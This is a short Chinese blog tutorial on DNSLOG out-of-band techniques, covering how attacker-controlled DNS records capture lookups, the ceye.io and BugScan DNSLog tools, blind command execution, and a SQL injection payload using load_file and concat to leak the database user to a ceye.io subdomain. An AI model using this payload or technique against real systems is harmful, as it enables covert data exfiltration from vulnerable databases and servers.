美文网首页
DNS log 学习

DNS log 学习

作者: IT大表哥 | 来源:发表于2019-11-08 11:48 被阅读0次

DNSLOG的原理

DNS的解析是递归与迭代相结合的,下面给出了当我们访问 www.o2oxy.cn 时.

最后面访问的还是该域名的NS 服务器。阿里云的域名的NS 记录都是可以修改的。也就是说。如果我们本地建立一个NS 的DNS 就可以控制到解析

DNSLOG工具

如果有自己的服务器和域名,可以自建一个这样的平台,直接使用BugScan团队开源的工具搭建即可:

https://github.com/BugScanTeam/DNSLog

另外我们也可以使用在线平台:

http://ceye.io

此次用的是ceye.io

image

在浏览器访问一下

image image image

在记录中就可以查询到了。那么在其他方面可以利用吗?如下:

命令执行无回显的情况下:

image

然后在后台看看情况

image

发下是root 用户。

那么还有没有其他的利用方式呢?

有的。SQL 注入和其他漏洞也可以使用的

例子:SQL 注入

image

pyload:

select load_file(concat(‘\\’, user(), ‘.hfkzaq.ceye.io’))

转载于某位安全大佬的博客https://www.o2oxy.cn

相关文章

  • DNS log 学习

    DNSLOG的原理 DNS的解析是递归与迭代相结合的,下面给出了当我们访问 www.o2oxy.cn 时. 最后面...

  • dns log

    常用以下两个网站http://ceye.io/[http://ceye.io/]http://www.dnslog...

  • SQL注入靶场—MySQL下的DNS log注入

    首先,DNS注入并不是是对DNS服务器进行注入,而是利用DNS在解析的时候会留下的有用的日志,简称:DNS log...

  • 系统架构师-DNS学习笔记

    DNS学习笔记 1.DNS概述 DNS(Domain Name System) 分布式数据库,域名空间 DNS服务...

  • DNS 学习

    今天我们一起来学习一下DNS DNS服务器怎么会知道每个域名的IP地址呢?答案是分级查询。比如域名 www.hex...

  • DNS学习

    DNS分级 一级DNS 一级域名解析 com .net .edu .cn .org 二级DNS 二级域名解析 ...

  • 什么是DNS、DNS劫持及DNS缓存

    前言 作为刚开始学习计算机的朋友,经常会听到DNS域名转发、DNS缓存、DNS劫持等等和DNS相关的专业术语,那么...

  • 学习笔记《DNS》

    对 DNS、DNS污染、DNS拦截等等概念一知半解,所以专门学习一下 DNS 最简单的理解,就是一种域名和IP的映...

  • Linux中DNS发生故障的主要原因有哪些?

    在学习Linux技术时,都会学习关于DNS的知识。DNS一般指域名系统,全拼:Domain Name System...

  • Linux智能DNS服务搭建之Bind服务(一)

    一、准备工作 1.DNS学前准备 学习目标: 1.了解原理:dns实现原理及实际dns应用 2.动手搭建:掌握Bi...

网友评论

      本文标题:DNS log 学习

      本文链接:https://www.haomeiwen.com/subject/naembctx.html